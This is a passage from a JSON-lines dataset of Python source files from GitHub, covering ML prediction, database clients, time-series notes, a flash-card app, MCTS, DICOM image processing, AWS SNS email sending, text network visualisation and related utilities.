Reorder columns to be the same as the training dataset\n d5 = d4[header]\n\n all_results = []\n for model_path in args.models:\n logging.info(\"Loading model {}\".format(model_path))\n model = load(model_path)\n logging.info(\"Loaded model {}\".format(model_path))\n\n doing_perceptron = 'Perceptron' in model_path\n\n preds = model.predict(d5)\n # if doing_perceptron:\n # probas = pl.lit(-1.0)\n # else:\n # probas = model.predict_proba(d5)[:,1]\n\n results = pl.DataFrame({\n 'node': list(d5.index.values),\n 'preds': preds\n })\n results = results.select(\n pl.col('node'),\n pl.col('preds').alias('prediction').cast(pl.Int64),\n # pl.col('proba').alias('probability').cast(pl.Float64),\n pl.lit(model_path).alias('model')\n )\n if doing_perceptron:\n results = results.with_columns(pl.lit(-1.0).alias('probability').cast(pl.Float64))\n else:\n results = results.with_columns(pl.lit(model.predict_proba(d5)[:,1]).alias('probability').cast(pl.Float64))\n all_results.append(results)\n\n pl.concat(all_results).write_csv(args.output_predictions, separator=\"\\t\")\n logging.info(\"Wrote predictions to {}\".format(args.output_predictions))\n ","repo_name":"wwood/bacterial_dating_aerobic_predictor","sub_path":"13_apply_model.py","file_name":"13_apply_model.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"10667819941","text":"import cx_Oracle\nfrom configs.config import get_settings\nfrom functools import lru_cache\n\nsettings = get_settings()\n\n@lru_cache()\ndef get_cursor():\n try:\n dsn = cx_Oracle.makedsn(\n settings.db_public_ip,\n settings.db_port,\n sid=settings.db_sid\n )\n connection = cx_Oracle.connect(\n settings.db_user,\n settings.db_password,\n dsn,\n encoding=\"UTF-8\"\n )\n print(\"Successfully connected to Oracle Database\")\n\n cursor = connection.cursor()\n return cursor, connection\n except cx_Oracle.Error as error:\n print(\"Error while connecting to Oracle:\", error)\n\n return None, None\n\n","repo_name":"Zoopast/DUOC-Feria-Backend","sub_path":"db/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4254650113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 6 20:38:51 2022\n\n@author: 12105\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# Time series, lesson 1:\ndf = pd.read_csv('input_data.csv')\n# Two types of features: time-step and lag features\n\n### Time-step features can be derived directly from the time index\n#Most basic time-step feature: time dummy (count of time steps in series from beginning to end)\n\ndf['Time'] = np.arange(len(df.index))\n\n# Lag features\n\ndf['Lag_1'] = df['Hardcover'].shift(1)\ndf = df.reindex(columns=['Hardcover','Lag_1'])\n\n# observations are shifted in time (similar to lag/lead window functions in SQL)\n# allows for investigating the effect of the previous observations \n\n# Lag plots view observations plotted against the previous observation\n\n#Lag features allow the modeling of serial dependence:\n# data can be predicted from previous observations\n\n#pandas' shift method is used to lag a series\ndf['Lag_1'] = df['NumVehicles'].shift(1)\n\n# DROP missing values and the corresponding targets:\nfrom sklearn.linear_model import LinearRegression\n\nX = df.loc[:, ['Lag_1']]\nX.dropna(inplace=True)\ny = df.loc[:, 'NumVehicles']\ny, X = y.align(X, join='inner')\n\nmodel = LinearRegression()\nmodel.fit(X,y)\n\ny_pred = pd.Series(model.predict(X), index=X.index)\n\n","repo_name":"ogradyso/Store_Sales_TimeSeries","sub_path":"kaggle_notes/analysis_kaggle.py","file_name":"analysis_kaggle.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45473116770","text":"from sqlalchemy import Table, Column, Integer, Numeric, String, MetaData, DateTime, PrimaryKeyConstraint, ForeignKey, \\\n UniqueConstraint, create_engine\nfrom datetime import datetime\n\n\nclass InitializeDataLayer:\n engine = None\n conn_string = None\n metadata = MetaData()\n\n users = Table(\"users\", metadata,\n Column(\"user_id\", Integer(), autoincrement=True, nullable=False),\n Column(\"login_id\", String(50), index=True),\n Column(\"first_name\", String(50)),\n Column(\"last_name\", String(50)),\n Column(\"phone\", String(50)),\n Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n PrimaryKeyConstraint('user_id', name='user_pk'),\n UniqueConstraint('login_id', name='uix_username')\n )\n\n customers = Table(\"customers\", metadata,\n Column(\"customer_id\", Integer(), primary_key=True, autoincrement=True),\n Column(\"id_type\", String(10)),\n Column(\"customer_ref\", String(50)),\n Column(\"personal_id\", String(50)),\n Column(\"email\", String(50)),\n Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n Column(\"created_by\", ForeignKey('users.user_id')),\n Column(\"updated_by\", ForeignKey('users.user_id'))\n )\n accounts = Table(\"account\", metadata,\n Column(\"account_id\", Integer(), primary_key=True, autoincrement=True),\n Column(\"account_number\", String(50), index=True),\n Column(\"name\", String(50)),\n Column(\"account_type\", String(50)),\n Column(\"balance\", Numeric(10, 2)),\n Column(\"customer_ref\", ForeignKey('customers.customer_ref')),\n Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n Column(\"created_by\", ForeignKey('users.user_id')),\n Column(\"updated_by\", ForeignKey('users.user_id')))\n\n def db_init(self, conn_string):\n self.conn_string = conn_string\n self.engine = create_engine(self.conn_string, echo=True)\n self.metadata.create_all(self.engine)\n\n def get_engine(self):\n return self.engine\n\n\ndal = InitializeDataLayer()\n","repo_name":"rajeshdas668822/retail-banking-python","sub_path":"src/native_sql/data_access/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23627002532","text":"from tkinter import Canvas, PhotoImage, Tk, Button, Label\nfrom typing import Text\nimport pandas as pd\nfrom random import choice\nBACKGROUND_COLOR = \"#B1DDC6\"\nFONT = 'Ariel'\n\n#Reading the data and creating a dictionary\ntry:\n data = pd.read_csv('./data/words_to_learn.csv').to_dict(orient='records')\nexcept FileNotFoundError:\n data = pd.read_csv('./data/french_words.csv').to_dict(orient='records')\n\nprint(len(data))\nword_dict = {}\n\n#Functions\ndef random_word():\n global word_dict, flip\n window.after_cancel(flip)\n word_dict = choice(data)\n french_word = word_dict['French']\n canvas.itemconfig(language_text, text='French', fill='black')\n canvas.itemconfig(vocab_word, text=french_word, fill='black')\n canvas.itemconfig(card, image=card_front_image)\n flip = window.after(3000, flip_card)\n\ndef right_button_click():\n data.remove(word_dict)\n pd.DataFrame(data).to_csv('./data/words_to_learn.csv', index=False)\n \n window.after_cancel(flip)\n random_word()\n\ndef wrong_button_click():\n window.after_cancel(flip)\n random_word()\n\ndef flip_card():\n canvas.itemconfig(language_text, text='English', fill='white')\n canvas.itemconfig(vocab_word, text=word_dict['English'], fill='white')\n canvas.itemconfig(card, image=card_back_image)\n\n#-----------Creating the User Interface--------\nwindow = Tk()\nwindow.title('Flash Card App')\nwindow.minsize(width=800, height=526)\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\ncanvas = Canvas(width=800, height=526, bg=BACKGROUND_COLOR, highlightthickness=0)\ncard_front_image = PhotoImage(file='.//images/card_front.png')\ncard_back_image = PhotoImage(file='./images/card_back.png')\ncard = canvas.create_image(400, 263, image=card_front_image)\nlanguage_text = canvas.create_text(400,150, text='French', fill='black', font=(FONT, 40, 'italic'))\nvocab_word = canvas.create_text(400,263, text='French', fill='black', font=(FONT, 60, 'bold'))\ncanvas.grid(column=0, row=0, columnspan=2)\n\nwrong_button_image = PhotoImage(file='./images/wrong.png')\nwrong_button = Button(image=wrong_button_image, highlightthickness=0, highlightbackground=BACKGROUND_COLOR, command=wrong_button_click)\nwrong_button.grid(column=0, row=1)\n\nright_button_image = PhotoImage(file='./images/right.png')\nright_button = Button(image=right_button_image, highlightthickness=0, highlightbackground=BACKGROUND_COLOR, command=right_button_click)\nright_button.grid(column=1, row=1)\n\nflip = window.after(3000, flip_card)\nrandom_word()\n\n\n\nwindow.mainloop()","repo_name":"gvarg75/UdemyDSCourse","sub_path":"100_days_of_python/day_31/flash-card-project-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8591460116","text":"'''PREREQUISITIES'''\n\n### these should go easy\nimport sys\nimport pandas as pd\nimport numpy as np\nimport os\nimport string\nimport collections\nimport regex as re\n\n\n### this requires installation\nimport nltk\nfrom nltk.collocations import *\n\n### for network analysis\nimport networkx as nx\n\n### for visualization\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport plotly.io as pio\n###init_notebook_mode(connected=True)\n\n\ndef network_formation_df(data_frame, prezident, lexicon_size, threshold):\n '''From a dataframe with rows corresponding to individual documents,\n to be subsellected on the basis of author's name column, for instance'''\n lemmata_list = []\n ### for each year's speech:\n for element in data_frame[data_frame[\"rok_prezident\"].str.endswith(prezident)][\"lemmata_filtered\"].tolist(): \n lemmata_list.extend(element)\n lexicon = [word_tuple[0] for word_tuple in nltk.FreqDist(lemmata_list).most_common(lexicon_size)]\n bigrams_list = []\n for element in data_frame[data_frame[\"rok_prezident\"].str.endswith(prezident)][\"lemmata_filtered\"].tolist():\n lemmatized_text = element\n for bigram in nltk.bigrams(lemmatized_text):\n if ((bigram[0] in lexicon) & (bigram[1] in lexicon)):\n if bigram[0] != bigram[1]:\n bigrams_list.append(tuple(sorted(bigram)))\n bigrams_counts = list((collections.Counter(bigrams_list)).items())\n bigrams_counts = sorted(bigrams_counts, key=lambda x: x[1], reverse=True)\n ### create a NetworkX object\n G = nx.Graph()\n G.clear()\n ### form the network from tuples of this form: (node1, node2, number of co-occurrences / lenght of the document)\n G.add_weighted_edges_from(np.array([(bigram_count[0][0], bigram_count[0][1], int(bigram_count[1])) for bigram_count in bigrams_counts if bigram_count[1] >= threshold]))\n ### add distance attribute\n for (u, v, wt) in G.edges.data('weight'):\n G.add_edge(u,v,distance=round(1/ int(wt), 5))\n document_lenght = len(lemmata_list)\n for (u, v, wt) in G.edges.data('weight'):\n G.add_edge(u,v,norm_weight=round(int(wt)/document_lenght, 5))\n return G\ndef ego_network_drawing_reduced(network, term, num_of_neighbours, title, mode):\n '''derrive ego network from a preexisting network\n specify source term and number of neighbors\n includes only shortest paths from the source'''\n length, path = nx.single_source_dijkstra(network, term, target=None, weight=\"distance\")\n shortest_nodes = list(length.keys())[0:num_of_neighbours+1]\n path_values_sorted = [dict_pair[1] for dict_pair in sorted(path.items(), key=lambda pair: list(length.keys()).index(pair[0]))]\n path_edges = []\n for path_to_term in path_values_sorted[1:num_of_neighbours+1]:\n path_edges.extend([tuple(sorted(bigram)) for bigram in nltk.bigrams(path_to_term)])\n shortest_edges = list(set(path_edges))\n ego_network = network.copy(as_view=False)\n nodes_to_remove = []\n for node in ego_network.nodes:\n if node not in shortest_nodes:\n nodes_to_remove.append(node)\n for element in nodes_to_remove:\n ego_network.remove_node(element) \n edges_to_remove = []\n for edge in ego_network.edges:\n if edge not in shortest_edges:\n if (edge[1],edge[0]) not in shortest_edges:\n edges_to_remove.append(edge)\n for element in edges_to_remove:\n ego_network.remove_edge(element[0], element[1])\n return draw_3d_network(ego_network, title, mode)\n\ndef draw_3d_network(networkx_object, file_name, mode):\n '''take networkX object and draw it in 3D'''\n Edges = list(networkx_object.edges)\n L=len(Edges)\n distance_list = [distance[2] for distance in list(networkx_object.edges.data(\"distance\"))]\n weight_list = [int(float(weight[2])) for weight in list(networkx_object.edges.data(\"weight\"))]\n labels= list(networkx_object.nodes)\n N = len(labels)\n adjc= [len(one_adjc) for one_adjc in list((nx.generate_adjlist(networkx_object)))] ### instead of \"group\"\n pos_3d=nx.spring_layout(networkx_object, weight=\"weight\", dim=3)\n nx.set_node_attributes(networkx_object, pos_3d, \"pos_3d\")\n layt = [list(array) for array in pos_3d.values()]\n N= len(networkx_object.nodes)\n Xn=[layt[k][0] for k in range(N)]# x-coordinates of nodes\n Yn=[layt[k][1] for k in range(N)]# y-coordinates\n Zn=[layt[k][2] for k in range(N)]# z-coordinates\n Xe=[]\n Ye=[]\n Ze=[]\n for Edge in Edges:\n Xe+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][0],networkx_object.nodes[Edge[1]][\"pos_3d\"][0], None]# x-coordinates of edge ends\n Ye+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][1],networkx_object.nodes[Edge[1]][\"pos_3d\"][1], None]\n Ze+=[networkx_object.nodes[Edge[0]][\"pos_3d\"][2],networkx_object.nodes[Edge[1]][\"pos_3d\"][2], None]\n\n ### to get the hover into the middle of the line\n ### we have to produce a node in the middle of the line\n ### based on https://stackoverflow.com/questions/46037897/line-hover-text-in-plotly\n\n middle_node_trace = go.Scatter3d(\n x=[],\n y=[],\n z=[],\n opacity=0,\n text=weight_list,\n mode='markers',\n hoverinfo='text',\n marker=dict(\n opacity=0\n )\n )\n\n for Edge in Edges:\n\n x0,y0,z0 = networkx_object.nodes[Edge[0]][\"pos_3d\"]\n x1,y1,z1 = networkx_object.nodes[Edge[1]][\"pos_3d\"]\n ###trace3['x'] += [x0, x1, None]\n ###trace3['y'] += [y0, y1, None]\n ###trace3['z'] += [z0, z1, None]\n ###trace3_list.append(trace3)\n middle_node_trace['x'] += tuple([(x0+x1)/2])\n middle_node_trace['y'] += tuple([(y0+y1)/2])#.append((y0+y1)/2)\n middle_node_trace['z'] += tuple([(z0+z1)/2])#.append((z0+z1)/2)\n \n\n ### edge trace \n edge_trace1 = go.Scatter3d(\n x=[], y=[], z=[],\n #hoverinfo='none',\n mode='lines',\n line=dict(width=0.8,color=\"#000000\"),\n )\n edge_trace2 = go.Scatter3d(\n x=[],y=[], z=[],\n #hoverinfo='none',\n mode='lines',\n line=dict(width=0.5,color=\"#404040\"),\n )\n edge_trace3 = go.Scatter3d(\n x=[], y=[], z=[],\n #hoverinfo='none',\n mode='lines',\n line=dict(width=0.3,color=\"#C0C0C0\"),\n )\n best_5percent_norm_weight = sorted(list(networkx_object.edges.data(\"norm_weight\")), key=lambda x: x[2], reverse=True)[int((len(networkx_object.edges.data(\"norm_weight\")) / 100) * 5)][2]\n best_20percent_norm_weight = sorted(list(networkx_object.edges.data(\"norm_weight\")), key=lambda x: x[2], reverse=True)[int((len(networkx_object.edges.data(\"norm_weight\")) / 100) * 20)][2]\n for edge in networkx_object.edges.data():\n if edge[2][\"norm_weight\"] >= best_5percent_norm_weight:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n else:\n if edge[2][\"norm_weight\"] >= best_20percent_norm_weight:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n else:\n x0, y0, z0 = networkx_object.node[edge[0]]['pos_3d']\n x1, y1, z1 = networkx_object.node[edge[1]]['pos_3d']\n edge_trace1['x'] += tuple([x0, x1, None])\n edge_trace1['y'] += tuple([y0, y1, None])\n edge_trace1['z'] += tuple([z0, z1, None])\n \n\n ### node trace\n node_trace=go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers+text',\n ###name=labels,\n marker=dict(symbol='circle',\n size=6,\n color=adjc,\n colorscale='Earth',\n reversescale=True,\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=[],\n #textposition='bottom center',\n #hovertext=adjc,\n #hoverinfo='text'\n )\n for node in networkx_object.nodes():\n node_trace[\"text\"] += tuple([node])\n \n axis=dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n layout = go.Layout(\n title=\"\",\n width=1200,\n height=800,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n annotations=[\n dict(\n showarrow=False,\n text=\"\",\n xref='paper',\n yref='paper',\n x=0,\n y=0.1,\n xanchor='left',\n yanchor='bottom',\n font=dict(\n size=14\n )\n )\n ], )\n data=[edge_trace1, edge_trace2, edge_trace3, node_trace, middle_node_trace]\n fig=go.Figure(data=data, layout=layout)\n if mode==\"offline\":\n return plot(fig, filename=\"../\" + file_name+\"_3D.html\")\n if mode==\"online\":\n return py.iplot(fig, filename=file_name)\n if mode==\"eps\":\n return pio.write_image(fig, \"../\" + file_name + \"_3D.eps\" , scale=1)\n\ndef ego_network_standard(dataframe, prezident_name, term, neighbours):\n network = network_formation_df(dataframe, prezident_name, 200, 1)\n if \"term\" not in network.nodes():\n print(\"This term is not part of given network. Try another one.\")\n else:\n ego_network_drawing_reduced(network, term, neighbours, prezident_name + \" - \" + term, \"offline\")","repo_name":"kasev/czech_textual_networks","sub_path":"ego_networks_generator.py","file_name":"ego_networks_generator.py","file_ext":"py","file_size_in_byte":10622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27956874952","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"createlisting\", views.createlisting, name=\"createlisting\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"item/<str:name>\", views.itempage, name=\"itempage\"),\n path(\"category\", views.category, name=\"category\"),\n path(\"category/<str:category>\", views.display_category, name=\"display_category\")\n]\n","repo_name":"OsafAliSayed/Auction","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42387616675","text":"from typing import Callable, Tuple\n\nimport parameters\nfrom TreeNode import TreeNode\nfrom world.simulated_world import SimulatedWorld\n\nPolicy = Callable[[Tuple[int, ...], Tuple[int, ...]], int] # (s, valid_actions) -> a\n\n\nclass MCTS:\n\n def __init__(self, initial_state: Tuple[int, ...]) -> None:\n self.root = TreeNode(initial_state)\n self.action_space = parameters.NUMBER_OF_ACTIONS\n\n def update_root(self, action: int) -> None:\n self.root = self.root.children[action]\n self.root.parent = None\n\n def get_normalized_distribution(self) -> Tuple[float, ...]:\n distribution = []\n for action in range(self.action_space):\n if action in self.root.children:\n distribution.append(float(self.root.children[action].visits) / float(self.root.visits))\n else:\n distribution.append(0.0)\n return tuple(distribution)\n\n def do_one_simulation(self, default_policy: Policy, world: SimulatedWorld) -> None:\n # Tree search\n current_node = self.root\n while current_node.is_not_leaf:\n action = current_node.tree_policy() # returns action to child node with highest UCT value\n world.step(action)\n current_node = current_node.children[action]\n\n # Node expansion. Always expand the root\n if not world.is_final_state() and (current_node.visits != 0 or current_node.parent is None):\n for action, legal in enumerate(world.get_legal_actions()):\n if bool(legal):\n current_node.add_node(action, world.generate_state(action))\n current_node = list(current_node.children.values())[0]\n\n # Rollout\n current_state = current_node.state\n while not world.is_final_state():\n legal_actions = world.get_legal_actions()\n action = default_policy(current_state, legal_actions)\n current_state, _ = world.step(action)\n\n # Backpropagation\n while current_node is not None:\n current_node.add_reward(world.get_winner_id())\n current_node.increment_visit_count()\n current_node = current_node.parent\n","repo_name":"nicklasbekkevold/MCTS","sub_path":"src/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19067178219","text":"import os\nimport shutil\nimport imageio\nimport pydicom\nimport numpy as np\nimport time\nimport pydicom\nfrom os.path import join\nfrom numpy import uint8\nfrom typing import List, Tuple\n\ndef get_id(path: str) -> Tuple[str, str]:\n f = pydicom.read_file(path, stop_before_pixels=True)\n return f.StudyInstanceUID, f.SeriesInstanceUID\n\n\ndef is_dicom_file(path: str) -> bool:\n \"\"\"Fast way to check whether file is DICOM.\"\"\"\n if not os.path.isfile(path):\n return False\n try:\n with open(path, \"rb\") as f:\n return f.read(132).decode(\"ASCII\")[-4:] == \"DICM\"\n except:\n return False\n\n\ndef dicom_files_in_dir(directory: str = \".\") -> List[str]:\n \"\"\"Full paths of all DICOM files in the directory.\"\"\"\n directory = os.path.expanduser(directory)\n candidates = [os.path.join(directory, f) for f in sorted(os.listdir(directory))]\n return [f for f in candidates if is_dicom_file(f)]\n\n\ndef dicom_to_bmp(dicomdir_path, desired_series):\n for root, _, files in os.walk(dicomdir_path):\n for file in files:\n if file == \"dicomdir\":\n dataset = pydicom.dcmread(join(root, file))\n break\n\n image_records = None\n\n patient_record = dataset.patient_records[0]\n study = patient_record.children[0]\n all_series = study.children\n for series in all_series:\n if series.SeriesDescription == desired_series:\n image_records = series.children\n break\n\n if image_records is None:\n raise IOError\n\n image_filenames = [join(dicomdir_path, *image_rec.ReferencedFileID)\n for image_rec in image_records]\n images = [pydicom.dcmread(image_filename)\n for image_filename in image_filenames]\n\n try:\n os.mkdir(\"Grid BMPs\")\n except FileExistsError:\n shutil.rmtree(\"Grid BMPs\")\n os.mkdir(\"Grid BMPs\")\n\n for frame_num, image in enumerate(images, 1):\n imageio.imwrite(join(\"Grid BMPs\", f\"Frame {str(frame_num).zfill(3)}.bmp\"),\n uint8(image.pixel_array))\n\n\ndef grid_images_to_folders(height_in_pixels, width_in_pixels, image_rows, image_cols):\n\n istep = height_in_pixels//image_rows\n jstep = width_in_pixels//image_cols\n\n try:\n os.mkdir(\"Split BMPs\")\n except FileExistsError:\n shutil.rmtree(\"Split BMPs\")\n os.mkdir(\"Split BMPs\")\n frame_number = 0\n for root, _, files in os.walk(\"Grid BMPs\"):\n for file in files:\n if file.endswith(\".bmp\"):\n frame_number += 1\n sub_im = imageio.imread(join(root, file))\n\n os.mkdir(f\"Split BMPs/Frame {str(frame_number).zfill(3)}\")\n slice_number = 1\n for i in range(0, height_in_pixels, istep):\n for j in range(0, width_in_pixels, jstep):\n imageio.imwrite(join(os.getcwd(), \"Split BMPs\",\n f\"Frame {str(frame_number).zfill(3)}\",\n f\"Slice {str(slice_number).zfill(3)}.bmp\"),\n sub_im[i:i+istep, j:j+jstep])\n slice_number += 1\n shutil.rmtree(\"Grid BMPs\")\n\n\ndef standard_deviation(std_dev_across_n_frames):\n frames = []\n\n for root, folders, _ in os.walk(\"Split BMPs\"):\n for folder in folders:\n if folder.startswith(\"Frame\"):\n frames.append(join(root, folder))\n\n output_frame_count = len(frames) // std_dev_across_n_frames\n\n try:\n os.mkdir(\"STD DEV\")\n except FileExistsError:\n shutil.rmtree(\"STD DEV\")\n os.mkdir(\"STD DEV\")\n\n for window in range(1, output_frame_count + 1):\n window_images = []\n for frame in frames[std_dev_across_n_frames * (window - 1): std_dev_across_n_frames * window]:\n frame_images = []\n for root, _, slices in os.walk(frame):\n for slic in slices:\n if slic.endswith(\".bmp\"):\n frame_images.append(imageio.imread(join(root, slic)))\n window_images.append(frame_images)\n\n window_images = np.array(window_images)\n output_images = np.empty(window_images.shape[1:])\n\n os.mkdir(join(\"STD DEV\", f\"Frame {str(window).zfill(3)}\"))\n\n for slice_number in range(output_images.shape[0]):\n for y in range(output_images.shape[1]):\n for x in range(output_images.shape[2]):\n output_images[slice_number, y, x] = np.std(\n window_images[:, slice_number, y, x])\n\n output_images *= 255.0/output_images.max()\n output_images = uint8(output_images)\n\n for slice_number in range(output_images.shape[0]):\n imageio.imwrite(join(\"STD DEV\", f\"Frame {str(window).zfill(3)}\",\n f\"Slice {str(slice_number + 1).zfill(3)}.bmp\"), output_images[slice_number])\n\n shutil.rmtree(\"Split BMPs\")\n","repo_name":"achouman34/capstone","sub_path":"Final Project/SlicerVR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37392722459","text":"#coding=utf-8 \r\nimport awsservices\r\nimport logging\r\n#topic:String:SNS中的主题,格式为:'arn:aws-cn:sns:cn-north-1:303361436695:Managers_ALL',后面的Managers_ALL是主题名称\r\n#subject:String:这个是邮件的主题\r\n#message:String:这个是邮件正文,换行使用\\n\r\ndef SendEmail(topic='arn:aws-cn:sns:cn-north-1:303361436695:dynamodb',subject='',message=''):\r\n loginfo = logging.getLogger('deploy')\r\n logdeploy = logging.getLogger('lastdeploy')\r\n logerror = logging.getLogger('errorinfo')\r\n try:\r\n loginfo.info(\"Mail Sent: %s\" % subject)\r\n logdeploy.info(\"Mail Sent: %s\" % subject)\r\n awsservices.get_awsclient('sns').publish(TopicArn=topic,Message=message,Subject=subject)\r\n except Exception as e:\r\n loginfo.info(\"Mail Error: %s\" % e)\r\n logdeploy.info(\"Mail Error: %s\" % e)\r\n logerror.info(\"Mail Error: %s\" % e)","repo_name":"travis103/travis103.github.io","sub_path":"python/DevOps/functions/SendSNS.py","file_name":"SendSNS.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31354323589","text":"from zope.app.testing import ztapi\nfrom unittest import TestCase, TestSuite, main, makeSuite\nfrom zope.app.component.browser.registration import EditRegistration\nfrom zope.app.container.interfaces import IContainer\nfrom zope.app.container.interfaces import IObjectRemovedEvent\nfrom zope.app.component.interfaces.registration import ActiveStatus\nfrom zope.app.traversing.interfaces import IContainmentRoot\nfrom zope.app.site.tests.placefulsetup import PlacefulSetup\nfrom zope.interface import Interface, implements\nfrom zope.app.publisher.browser import BrowserView\nfrom zope.publisher.browser import TestRequest\nfrom zope.app.container.contained import Contained\n\nclass Container(dict):\n implements(IContainer, IContainmentRoot)\n\nclass I(Interface):\n pass\n\nclass C(Contained):\n implements(I)\n status = ActiveStatus\n\n\nclass Test(PlacefulSetup, TestCase):\n\n def test_remove_objects(self):\n c1 = C()\n c2 = C()\n c7 = C()\n d = Container({'1': c1, '2': c2, '7': c7})\n view = EditRegistration(d, TestRequest())\n view.remove_objects(['2', '7'])\n self.assertEqual(d, {'1': c1})\n\n def test_registrationInfo(self):\n\n class V(BrowserView):\n def setPrefix(self, p):\n self._prefix = p\n\n ztapi.browserView(I, 'ItemEdit', V)\n\n c1 = C()\n c2 = C()\n c7 = C()\n d = Container({'1': c1, '2': c2, '7': c7})\n c1.__parent__ = d; c1.__name__ = '1'\n c2.__parent__ = d; c2.__name__ = '2'\n c7.__parent__ = d; c7.__name__ = '7'\n\n view = EditRegistration(d, TestRequest())\n\n info = view.registrationInfo()\n self.assertEqual(len(info), 3)\n self.assertEqual(info[0]['name'], '1')\n self.assertEqual(info[1]['name'], '2')\n self.assertEqual(info[2]['name'], '7')\n\ndef test_suite():\n return TestSuite((\n makeSuite(Test),\n ))\n\nif __name__=='__main__':\n main(defaultTest='test_suite')\n","repo_name":"wpjunior/proled","sub_path":"Zope-2.9/lib/python/zope/app/component/browser/tests/test_editregistration.py","file_name":"test_editregistration.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23698435556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 24 08:18:04 2016\r\n\r\n@author: npop\r\n\r\nclass DataWriter\r\nParent class for data writers\r\nNOTE: all data formats written have the same headers\r\nWriting of ats style xml headers is not supported\r\n\"\"\"\r\nimport os\r\nimport glob\r\nimport struct\r\nimport xml.etree.ElementTree as ET\r\nfrom datetime import datetime, timedelta\r\nimport numpy as np\r\n# utils\r\nfrom utilsIO import *\r\n\r\nclass DataWriter(object):\r\n\r\n\t###################\r\n\t### CONSTRUCTOR\r\n\t##################\r\n\tdef __init__(self):\r\n\t\tself.outPath = \"\"\r\n\t\t# in subclasses, extension might change\r\n\t\t# i.e. .ats\r\n\t\tself.extension = \".dat\"\r\n\t\t# data type - the format of the data being written out\r\n\t\tself.dtype = np.int32\r\n\t\t# information about data being written\r\n\t\tself.headers = None\r\n\t\tself.chans = None\r\n\t\tself.chanMap = None\r\n\t\tself.chanHeaders = None\r\n\r\n\r\n\t###################\r\n\t### GET FUNCTIONS\r\n\t##################\r\n\tdef getOutPath(self):\r\n\t\treturn self.outPath\r\n\r\n\r\n\t###################\r\n\t### SET FUNCTIONS\r\n\t##################\r\n\tdef setOutPath(self, path):\r\n\t\tself.outPath = path\r\n\r\n\tdef setGlobalHeadersFromKeywords(self, headers, keywords):\r\n\t\tglobalHeaderwords = self.globalHeaderwords()\r\n\t\tfor gH in globalHeaderwords:\r\n\t\t\thdrVal = \"\"\r\n\t\t\tif gH in headers:\r\n\t\t\t\thdrVal = headers[gH]\r\n\t\t\tif gH in keywords:\r\n\t\t\t\thdrVal = keywords[gH]\r\n\t\t\theaders[gH] = hdrVal\r\n\t\treturn headers\t\r\n\r\n\tdef setChanHeadersFromKeywords(self, chanHeaders, keywords):\r\n\t\tchanHeaderwords = self.chanHeaderwords()\r\n\t\tfor iChan in xrange(0, len(chanHeaders)):\r\n\t\t\tfor cH in chanHeaderwords:\r\n\t\t\t\thdrVal = \"\"\r\n\t\t\t\tif cH in chanHeaders[iChan]:\r\n\t\t\t\t\thdrVal = 